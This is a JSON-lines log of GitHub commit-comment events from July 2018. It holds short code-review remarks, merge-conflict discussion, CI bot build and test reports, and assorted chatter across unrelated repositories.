{"id":"7940403276","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29648532,"position":10,"line":183,"path":"src/main/java/com/google/devtools/build/lib/rules/apple/XcodeConfig.java","commit_id":"2bea6c6eefc1fbf3e0bd14f201ce2031e126ee4c","created_at":"2018-07-09T22:19:34Z","updated_at":"2018-07-09T22:19:34Z","author_association":"CONTRIBUTOR","body":"s/blaze/bazel ?"}},"created_at":"2018-07-09T22:19:34Z"}
{"id":"7940403346","type":"CommitCommentEvent","actor":{"login":"meren"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29648533,"position":25,"line":219,"path":"_posts/anvio/2016-11-08-pangenomics-v2.md","commit_id":"302909868f8a611feb9d92814e7147839e0bc734","created_at":"2018-07-09T22:19:35Z","updated_at":"2018-07-09T22:19:35Z","author_association":"MEMBER","body":"why are there so many conflicts in these files? :(\r\n\r\nI think your copy was very old and you didn't merge `master` into your branch for ages. "}},"created_at":"2018-07-09T22:19:35Z"}
{"id":"7940403929","type":"CommitCommentEvent","actor":{"login":"Virvolta"},"repo":{"name":"DauFin/DF-PM"},"payload":{"comment":{"id":29648538,"position":null,"line":null,"path":null,"commit_id":"c253a5d09c27876995a07e4388377d1a76696cef","created_at":"2018-07-09T22:19:45Z","updated_at":"2018-07-09T22:19:45Z","author_association":"CONTRIBUTOR","body":"\"Class  not found\"\r\n"}},"created_at":"2018-07-09T22:19:45Z"}
{"id":"7940406086","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648541,"position":47,"line":47,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:20:20Z","updated_at":"2018-07-09T22:20:20Z","author_association":"COLLABORATOR","body":"refactor to a function with well explained name"}},"created_at":"2018-07-09T22:20:20Z"}
{"id":"7940407136","type":"CommitCommentEvent","actor":{"login":"monsterkodi"},"repo":{"name":"appget/appget.packages"},"payload":{"comment":{"id":29648543,"position":null,"line":null,"path":null,"commit_id":"21e2879fcdfddbffacb58b98f438df405ba92ab1","created_at":"2018-07-09T22:20:38Z","updated_at":"2018-07-09T22:20:38Z","author_association":"CONTRIBUTOR","body":"Thank you. Looking forward to the icon gallery.\r\n"}},"created_at":"2018-07-09T22:20:38Z"}
{"id":"7940407514","type":"CommitCommentEvent","actor":{"login":"meren"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29648544,"position":25,"line":219,"path":"_posts/anvio/2016-11-08-pangenomics-v2.md","commit_id":"302909868f8a611feb9d92814e7147839e0bc734","created_at":"2018-07-09T22:20:44Z","updated_at":"2018-07-09T22:20:44Z","author_association":"MEMBER","body":"Looking more carefully, it seems there are only two files with conflicts:\r\n\r\n- [ ] `_posts/anvio/2017-06-07-phylogenomics.md`\r\n- [ ] `_posts/anvio/2016-11-08-pangenomics-v2.md`\r\n\r\nI will take care of them in `master`."}},"created_at":"2018-07-09T22:20:44Z"}
{"id":"7940408490","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":29648545,"position":8,"line":14,"path":"Documentation/debugging/debugging-packages.md","commit_id":"fdf24835b102270b53bd02bf2e5f25c6822af4f0","created_at":"2018-07-09T22:21:02Z","updated_at":"2018-07-09T22:21:02Z","author_association":"MEMBER","body":"I would remove the `In general, always build the .builds file instead of any of the csproj to ensure that all` now that you are building the .builds files. Might be worth adding a comment about building all configurations `/t:BuildAll` or `/t:RebuildAll`. "}},"created_at":"2018-07-09T22:21:02Z"}
{"id":"7940409772","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648548,"position":67,"line":67,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:21:23Z","updated_at":"2018-07-09T22:21:23Z","author_association":"COLLABORATOR","body":"remove"}},"created_at":"2018-07-09T22:21:23Z"}
{"id":"7940411040","type":"CommitCommentEvent","actor":{"login":"jeremiahjstacey"},"repo":{"name":"jeremiahjstacey/esapi-java-legacy-dev"},"payload":{"comment":{"id":29648552,"position":5,"line":254,"path":"src/test/java/org/owasp/esapi/reference/crypto/EncryptorTest.java","commit_id":"b54019eab92f58cdf017a26568f079b028cc5f35","created_at":"2018-07-09T22:21:44Z","updated_at":"2018-07-09T22:21:44Z","author_association":"OWNER","body":"This is the line that I show as failing.\r\n\r\n` testNewEncryptDecrypt(org.owasp.esapi.reference.crypto.EncryptorTest): DESede/CBC/PKCS5Padding encoded key size does not match provided key size expected:<24> but was:<16>`"}},"created_at":"2018-07-09T22:21:44Z"}
{"id":"7940412059","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648556,"position":66,"line":66,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:22:02Z","updated_at":"2018-07-09T22:22:02Z","author_association":"COLLABORATOR","body":"siteList / siteArray/ sites/ websites"}},"created_at":"2018-07-09T22:22:02Z"}
{"id":"7940412930","type":"CommitCommentEvent","actor":{"login":"TheXWolf"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29648559,"position":null,"line":null,"path":null,"commit_id":"8b7ccfd4c0cc9404d7d353aaea9dbdac11a13f51","created_at":"2018-07-09T22:22:17Z","updated_at":"2018-07-09T22:22:17Z","author_association":"NONE","body":"When you find the time, please for heaven sake, [lol] fix the sound on the island. "}},"created_at":"2018-07-09T22:22:17Z"}
{"id":"7940413588","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648562,"position":null,"line":null,"path":null,"commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:22:29Z","updated_at":"2018-07-09T22:22:29Z","author_association":"COLLABORATOR","body":"code review"}},"created_at":"2018-07-09T22:22:29Z"}
{"id":"7940414541","type":"CommitCommentEvent","actor":{"login":"emersonllp"},"repo":{"name":"emersonllp/Emerson-Llerena"},"payload":{"comment":{"id":29648564,"position":null,"line":null,"path":null,"commit_id":"a310c9b6311fa7992851736c38157a55e352b96c","created_at":"2018-07-09T22:22:45Z","updated_at":"2018-07-09T22:22:45Z","author_association":"OWNER","body":"Alcance del proyecto\r\nEl restaurante rústica de los olivos te ofrece una deliciosa experiencia gastronómica con la mejor atención al cliente. El sitio perfecto seguramente has escuchado que son la más grande cadena de buffet de Lima pero no te quedes con las ganas y ven con tu familia o con tu grupo de amigos a vivir un momento agradable y de buen sabor. Posee una variada carta de platos criollos tradicionales, elaborados con cariño y dedicación. Su ambiente es alegre y la atención es totalmente personalizada."}},"created_at":"2018-07-09T22:22:45Z"}
{"id":"7940415334","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648565,"position":83,"line":83,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:22:59Z","updated_at":"2018-07-09T22:22:59Z","author_association":"COLLABORATOR","body":"remove"}},"created_at":"2018-07-09T22:22:59Z"}
{"id":"7940417033","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648568,"position":80,"line":80,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:23:28Z","updated_at":"2018-07-09T22:23:28Z","author_association":"COLLABORATOR","body":"explanation or refactor to a function with explained name"}},"created_at":"2018-07-09T22:23:28Z"}
{"id":"7940417569","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-github"},"payload":{"comment":{"id":29648571,"position":null,"line":null,"path":null,"commit_id":"25d362ef3dad43e40b4b8a565f53b8b2def196e9","created_at":"2018-07-09T22:23:37Z","updated_at":"2018-07-09T22:23:37Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"taskId\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-09T22:23:37.752Z\n\n</details>"}},"created_at":"2018-07-09T22:23:37Z"}
{"id":"7940417657","type":"CommitCommentEvent","actor":{"login":"Aimanizales"},"repo":{"name":"Aimanizales/React-Tutorial"},"payload":{"comment":{"id":29648572,"position":13,"line":86,"path":"src/ThinkingInReact.js","commit_id":"ddcb16f89a084bd27d2253428746ba6c8f637aa0","created_at":"2018-07-09T22:23:39Z","updated_at":"2018-07-09T22:23:39Z","author_association":"OWNER","body":"@jupavavi"}},"created_at":"2018-07-09T22:23:39Z"}
{"id":"7940435363","type":"CommitCommentEvent","actor":{"login":"ctf0"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29648615,"position":null,"line":null,"path":null,"commit_id":"c0ad92e78858d147d536f1a5b2e3b7e04e2ed79e","created_at":"2018-07-09T22:28:41Z","updated_at":"2018-07-09T22:28:41Z","author_association":"OWNER","body":"@olssonm can u plz test this on ur setup and see if all is working as expected ?"}},"created_at":"2018-07-09T22:28:41Z"}
{"id":"7940435995","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-effects-feedstock"},"payload":{"comment":{"id":29648617,"position":null,"line":null,"path":null,"commit_id":"01fcbb22c175aaf755984977bbeb24e3a2409f85","created_at":"2018-07-09T22:28:51Z","updated_at":"2018-07-09T22:28:51Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @ccwang002 were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T22:28:51Z"}
{"id":"7940436523","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29648619,"position":null,"line":null,"path":null,"commit_id":"d7bdd9b3cb886f67766e40decd4c1d4136209dcb","created_at":"2018-07-09T22:29:00Z","updated_at":"2018-07-09T22:29:00Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-120](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-120).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-120-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-09T22:29:00Z"}
{"id":"7940437327","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29648622,"position":null,"line":null,"path":null,"commit_id":"1496960793e1850d85fae8dd3e0a06f31cad2fd7","created_at":"2018-07-09T22:29:14Z","updated_at":"2018-07-09T22:29:14Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add dummy explosion](https://trello.com/c/8PjJKYa4/39-add-dummy-explosion)"}},"created_at":"2018-07-09T22:29:14Z"}
{"id":"7940443181","type":"CommitCommentEvent","actor":{"login":"rcgoodfellow"},"repo":{"name":"ceftb/engine"},"payload":{"comment":{"id":29648632,"position":null,"line":null,"path":null,"commit_id":"b4d065424580e18aafd97e38eeb635e824727bf4","created_at":"2018-07-09T22:30:53Z","updated_at":"2018-07-09T22:30:53Z","author_association":"MEMBER","body":"So delete being synonymous with dematerialize marks the materialization for dematerialization. However, dematerialization is a heavy weight process and thus the delete is asynchronous. The operation will **eventually** conform to the expected REST semantics, but you have to check back to get the result.\r\n\r\nThe materializaion agents are responsible for monitoring the materialization state table and driving toward the target state. They should delete the materializaion entry once dematerialization is complete."}},"created_at":"2018-07-09T22:30:53Z"}
{"id":"7940447389","type":"CommitCommentEvent","actor":{"login":"PeterJCLaw"},"repo":{"name":"srobo/ops-manual"},"payload":{"comment":{"id":29648638,"position":49,"line":49,"path":"annual-robotics-competition/core-team.md","commit_id":"c8f282ea67e0d21b8eee559a287093e3f74d8af2","created_at":"2018-07-09T22:32:10Z","updated_at":"2018-07-09T22:32:10Z","author_association":"MEMBER","body":"@richardbarlow could you expand on the intent of this dataset?\r\n\r\nIf the core team wanted to contact volunteers to see who wanted to help with something; is the idea that this would go to this dataset through the trustees, or is there another dataset for that?"}},"created_at":"2018-07-09T22:32:10Z"}
{"id":"7940448108","type":"CommitCommentEvent","actor":{"login":"ShaiberAlon"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29648640,"position":null,"line":null,"path":null,"commit_id":"c3939cbd798a86d3457f3a134ead401cc29d8e85","created_at":"2018-07-09T22:32:22Z","updated_at":"2018-07-09T22:32:22Z","author_association":"MEMBER","body":"OMG. So sorry about that!!"}},"created_at":"2018-07-09T22:32:22Z"}
{"id":"7940449288","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Counter"},"payload":{"comment":{"id":29648642,"position":null,"line":null,"path":null,"commit_id":"f3ee17b07c70331b06f821a08270e6b2d3533acf","created_at":"2018-07-09T22:32:43Z","updated_at":"2018-07-09T22:32:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Counter - MVP](https://trello.com/c/yqbBMRGp/3-counter-mvp)"}},"created_at":"2018-07-09T22:32:43Z"}
{"id":"7940449889","type":"CommitCommentEvent","actor":{"login":"isi-lincoln"},"repo":{"name":"ceftb/engine"},"payload":{"comment":{"id":29648645,"position":null,"line":null,"path":null,"commit_id":"b4d065424580e18aafd97e38eeb635e824727bf4","created_at":"2018-07-09T22:32:54Z","updated_at":"2018-07-09T22:32:54Z","author_association":"MEMBER","body":"> The operation will eventually conform to the expected REST semantics\r\n\r\nOkay, than that is not currently how it is operating. If you run the api test suite, twice (at any point, wait 30 minutes or an hour), it will always fail due to the stateboard for the materialize never being removed (currently zero'd)\r\n"}},"created_at":"2018-07-09T22:32:54Z"}
{"id":"7940454074","type":"CommitCommentEvent","actor":{"login":"locojoetive"},"repo":{"name":"LastMinuteHero/DB-Zerstoerer"},"payload":{"comment":{"id":29648649,"position":null,"line":null,"path":null,"commit_id":"e7f483347771151979b592f657e7c0c6652db321","created_at":"2018-07-09T22:34:06Z","updated_at":"2018-07-09T22:34:06Z","author_association":"COLLABORATOR","body":"Aber tut immernoch nicht :/"}},"created_at":"2018-07-09T22:34:06Z"}
{"id":"7940455221","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29648654,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T22:34:25Z","updated_at":"2018-07-09T22:34:25Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-09T22:34:25Z"}
{"id":"7940459803","type":"CommitCommentEvent","actor":{"login":"terry27259"},"repo":{"name":"terry27259/Hello-World"},"payload":{"comment":{"id":29648663,"position":null,"line":null,"path":null,"commit_id":"0cba824ac858749ce4dfced2f66bf9755801b81a","created_at":"2018-07-09T22:35:41Z","updated_at":"2018-07-09T22:35:41Z","author_association":"OWNER","body":"Ok, I see I'm going to do a lot of work in this system to improve my computing skills and code productivity."}},"created_at":"2018-07-09T22:35:41Z"}
{"id":"7940461303","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29648667,"position":null,"line":null,"path":null,"commit_id":"eb07e3e8a34ce3ea3cf9a7cfd42ca8bc1a5feae2","created_at":"2018-07-09T22:36:06Z","updated_at":"2018-07-09T22:36:06Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-65](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-65).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-65-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-09T22:36:06Z"}
{"id":"7940462428","type":"CommitCommentEvent","actor":{"login":"Nickheythatsme"},"repo":{"name":"Nickheythatsme/SentimentAnalysis"},"payload":{"comment":{"id":29648669,"position":null,"line":null,"path":null,"commit_id":"9326797d0f9b19984ba6e1394b3162dcfac8ae17","created_at":"2018-07-09T22:36:25Z","updated_at":"2018-07-09T22:36:25Z","author_association":"OWNER","body":"[1/1] Running tests...\nTest project /home/nick/Programming/SentimentAnalysis/_debug\n    Start 1: parse_test\n1/2 Test #1: parse_test .......................   Passed    0.01 sec\n    Start 2: btree\n2/2 Test #2: btree ............................   Passed    0.01 sec\n\n100% tests passed, 0 tests failed out of 2\n\nTotal Test time (real) =   0.02 sec\n"}},"created_at":"2018-07-09T22:36:25Z"}
{"id":"7940465152","type":"CommitCommentEvent","actor":{"login":"rcgoodfellow"},"repo":{"name":"ceftb/engine"},"payload":{"comment":{"id":29648671,"position":null,"line":null,"path":null,"commit_id":"b4d065424580e18aafd97e38eeb635e824727bf4","created_at":"2018-07-09T22:37:11Z","updated_at":"2018-07-09T22:37:11Z","author_association":"MEMBER","body":"Ok. Then that's definitely a bug. We should maintain expected REST semantics "}},"created_at":"2018-07-09T22:37:11Z"}
{"id":"7940466100","type":"CommitCommentEvent","actor":{"login":"Nickheythatsme"},"repo":{"name":"Nickheythatsme/SentimentAnalysis"},"payload":{"comment":{"id":29648673,"position":null,"line":null,"path":null,"commit_id":"9326797d0f9b19984ba6e1394b3162dcfac8ae17","created_at":"2018-07-09T22:37:27Z","updated_at":"2018-07-09T22:37:27Z","author_association":"OWNER","body":"[1/1] Running tests...\nTest project /home/nick/Programming/SentimentAnalysis/_debug\n    Start 1: parse_test\n1/2 Test #1: parse_test .......................   Passed    0.00 sec\n    Start 2: btree\n2/2 Test #2: btree ............................   Passed    0.00 sec\n\n100% tests passed, 0 tests failed out of 2\n\nTotal Test time (real) =   0.01 sec\n"}},"created_at":"2018-07-09T22:37:27Z"}
{"id":"7940466180","type":"CommitCommentEvent","actor":{"login":"ilyashusterman"},"repo":{"name":"NikitaKhomenko/word-searcher"},"payload":{"comment":{"id":29648674,"position":102,"line":102,"path":"wordSearch.c","commit_id":"2397d7d68a03cf470d27af38611395b5b1e13ba3","created_at":"2018-07-09T22:37:29Z","updated_at":"2018-07-09T22:37:29Z","author_association":"COLLABORATOR","body":"substringFirstWord"}},"created_at":"2018-07-09T22:37:29Z"}
{"id":"7940468420","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29648681,"position":null,"line":null,"path":null,"commit_id":"2c59708890ceb712141f870f46ec8780d9ed0eee","created_at":"2018-07-09T22:38:05Z","updated_at":"2018-07-09T22:38:05Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-67](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-67).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-67-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-09T22:38:05Z"}
{"id":"7940469971","type":"CommitCommentEvent","actor":{"login":"richard-evans"},"repo":{"name":"richard-evans/vampire"},"payload":{"comment":{"id":29648684,"position":null,"line":null,"path":null,"commit_id":"da093549d4afafa6b494946b12ce16ed03a35e78","created_at":"2018-07-09T22:38:30Z","updated_at":"2018-07-09T22:38:30Z","author_association":"OWNER","body":"Oops - fixed!"}},"created_at":"2018-07-09T22:38:30Z"}
{"id":"7940470718","type":"CommitCommentEvent","actor":{"login":"gsherwood"},"repo":{"name":"squizlabs/HTML_CodeSniffer"},"payload":{"comment":{"id":29648685,"position":11,"line":153,"path":"README.markdown","commit_id":"14d5872a2ec6e0fdce31ba5b94cd7557de0cccab","created_at":"2018-07-09T22:38:43Z","updated_at":"2018-07-09T22:38:43Z","author_association":"MEMBER","body":"Fixed :) Thanks for that translation."}},"created_at":"2018-07-09T22:38:43Z"}
{"id":"7940472291","type":"CommitCommentEvent","actor":{"login":"nico89ar"},"repo":{"name":"gabzim/learning"},"payload":{"comment":{"id":29648691,"position":15,"line":15,"path":"src/main/kotlin/io/learning/api/di/DatabaseModule.kt","commit_id":"34ee8c78e2fd315e35633fb1a5554d2faad156fc","created_at":"2018-07-09T22:39:11Z","updated_at":"2018-07-09T22:39:11Z","author_association":"COLLABORATOR","body":"Sí, es verdad. Justo eso lo estaba cambiando, entre otras cosas."}},"created_at":"2018-07-09T22:39:11Z"}
{"id":"7940474172","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29648694,"position":null,"line":null,"path":null,"commit_id":"6da42fd59166d9d63917fd92d4e2f36f5e70400b","created_at":"2018-07-09T22:39:44Z","updated_at":"2018-07-09T22:39:44Z","author_association":"NONE","body":"I killed the branch because it seems like whenever I have more than one commit in one branch it just sits and sits for months until I have to rewrite it again anyhow.  Better two branches than one.\r\n\r\nI did the cherry-pick and delt with the merge conflict.  Now there is a new commit.  Let me know if I need to change it again."}},"created_at":"2018-07-09T22:39:44Z"}
{"id":"7940474486","type":"CommitCommentEvent","actor":{"login":"CobraKiala"},"repo":{"name":"CobraKiala/developers"},"payload":{"comment":{"id":29648696,"position":null,"line":null,"path":null,"commit_id":"50e076f21940543b01438ca868cdd449ddc31b0d","created_at":"2018-07-09T22:39:49Z","updated_at":"2018-07-09T22:39:49Z","author_association":"OWNER","body":"I added my name for the video!"}},"created_at":"2018-07-09T22:39:49Z"}
{"id":"7940477351","type":"CommitCommentEvent","actor":{"login":"Nickheythatsme"},"repo":{"name":"Nickheythatsme/SentimentAnalysis"},"payload":{"comment":{"id":29648704,"position":null,"line":null,"path":null,"commit_id":"9326797d0f9b19984ba6e1394b3162dcfac8ae17","created_at":"2018-07-09T22:40:37Z","updated_at":"2018-07-09T22:40:37Z","author_association":"OWNER","body":"[1/1] Running tests...\nTest project /home/nick/Programming/SentimentAnalysis/_debug\n    Start 1: parse_test\n1/2 Test #1: parse_test .......................   Passed    0.00 sec\n    Start 2: btree\n2/2 Test #2: btree ............................   Passed    0.00 sec\n\n100% tests passed, 0 tests failed out of 2\n\nTotal Test time (real) =   0.01 sec\n"}},"created_at":"2018-07-09T22:40:37Z"}
{"id":"7940479578","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29648710,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T22:41:15Z","updated_at":"2018-07-09T22:41:15Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T22:41:15Z"}
{"id":"7940482023","type":"CommitCommentEvent","actor":{"login":"twstokes"},"repo":{"name":"twstokes/door_detect"},"payload":{"comment":{"id":29648718,"position":null,"line":null,"path":null,"commit_id":"23a2f3026000163e159fba4d9e10fb2ac535e570","created_at":"2018-07-09T22:41:59Z","updated_at":"2018-07-09T22:41:59Z","author_association":"OWNER","body":"Hey there, I'll be glad to. Could you share the model of your webcam? I may have something similar I can test. Thanks!"}},"created_at":"2018-07-09T22:41:59Z"}
{"id":"7940487506","type":"CommitCommentEvent","actor":{"login":"Rakkmark"},"repo":{"name":"richonlymiles/adriennesite"},"payload":{"comment":{"id":29648732,"position":5,"line":5,"path":"adrienne/adriennefontenot/adriennefontenot.html","commit_id":"9921ad43a511cfea19775321aafe88d7a62bef56","created_at":"2018-07-09T22:43:36Z","updated_at":"2018-07-09T22:43:36Z","author_association":"NONE","body":"Remove the \"/\""}},"created_at":"2018-07-09T22:43:36Z"}
{"id":"7940488943","type":"CommitCommentEvent","actor":{"login":"ctf0"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29648735,"position":null,"line":null,"path":null,"commit_id":"4a0ed344cb80a1c1a5b7af01197a3362612e6cc0","created_at":"2018-07-09T22:44:01Z","updated_at":"2018-07-09T22:44:01Z","author_association":"OWNER","body":"@olssonm can u plz test this on ur setup and see if all is working as expected ?"}},"created_at":"2018-07-09T22:44:01Z"}
{"id":"7940490110","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29648740,"position":null,"line":null,"path":null,"commit_id":"6da42fd59166d9d63917fd92d4e2f36f5e70400b","created_at":"2018-07-09T22:44:23Z","updated_at":"2018-07-09T22:44:23Z","author_association":"NONE","body":"Whatever I did, now both commits are in the ffuplink-notunnel-macaddr branch."}},"created_at":"2018-07-09T22:44:23Z"}
{"id":"7940490332","type":"CommitCommentEvent","actor":{"login":"Nickheythatsme"},"repo":{"name":"Nickheythatsme/SentimentAnalysis"},"payload":{"comment":{"id":29648742,"position":null,"line":null,"path":null,"commit_id":"ce3485b89ed399f562c9e89820ad94b7ef073133","created_at":"2018-07-09T22:44:27Z","updated_at":"2018-07-09T22:44:27Z","author_association":"OWNER","body":"Recompacting log...\n[1/1] Running tests...\nTest project /home/nick/Programming/SentimentAnalysis/_debug\n    Start 1: parse_test\n1/2 Test #1: parse_test .......................   Passed    0.00 sec\n    Start 2: btree\n2/2 Test #2: btree ............................   Passed    0.00 sec\n\n100% tests passed, 0 tests failed out of 2\n\nTotal Test time (real) =   0.01 sec\n"}},"created_at":"2018-07-09T22:44:27Z"}
{"id":"7940490697","type":"CommitCommentEvent","actor":{"login":"racha999"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29648744,"position":null,"line":null,"path":null,"commit_id":"ac17f43b10d3153c24c34ddbe0baa6963fa3ea17","created_at":"2018-07-09T22:44:33Z","updated_at":"2018-07-09T22:44:33Z","author_association":"NONE","body":"[Add to Buffer.txt](https://github.com/github/explore/files/2178256/Add.to.Buffer.txt)\r\n"}},"created_at":"2018-07-09T22:44:33Z"}
{"id":"7940490703","type":"CommitCommentEvent","actor":{"login":"TimMoore"},"repo":{"name":"akka/akka-persistence-cassandra"},"payload":{"comment":{"id":29648745,"position":4,"line":98,"path":"core/src/main/scala/akka/persistence/cassandra/ConfigSessionProvider.scala","commit_id":"36c29c2827ea2c0fdbd4376591d649cb857be626","created_at":"2018-07-09T22:44:34Z","updated_at":"2018-07-09T22:44:34Z","author_association":"COLLABORATOR","body":"In this case, Lagom creates another `Session` for use in read-side processors, so it has its own `reference.conf` section for that. We'll add this property to it when we upgrade, but if you want this library to support new config properties for arbitrary sessions without breaking existing code, maybe there could be a `cassandra-defaults` section in the config (or something like that) and this could automatically add it as a fallback.\r\n\r\n(I'm not sure what the specific plans for config changes in 1.0 are, so maybe this suggestion won't make sense.)"}},"created_at":"2018-07-09T22:44:34Z"}
